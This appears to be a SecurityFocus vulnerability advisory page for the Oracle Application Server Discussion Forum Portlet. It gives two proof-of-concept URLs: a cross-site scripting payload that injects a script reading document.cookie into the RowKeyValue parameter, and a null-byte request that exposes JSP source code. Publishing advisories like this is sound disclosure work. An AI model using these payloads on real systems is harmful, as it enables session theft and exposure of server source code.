Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Oracle Application Server Discussion Forum Portlet Multiple Remote Vulnerabilities

Exploit code is not required.

The following proof of concept examples are available:

Cross-site scripting:
http://www.example.com/portal/page?_pageid=XXX,XXX&_dad=portal&_schema=PORTAL&
df_next_page=htdocs/forums.jsp&
RowKeyValue=<script>alert(document.cookie)</script>

Source code disclosure:
http://www.example.com/portal/page?_pageid=XXX,XXX&_dad=portal&_schema=PORTAL&
df_next_page=htdocs/search.jsp%00







 

Privacy Statement
Copyright 2009, SecurityFocus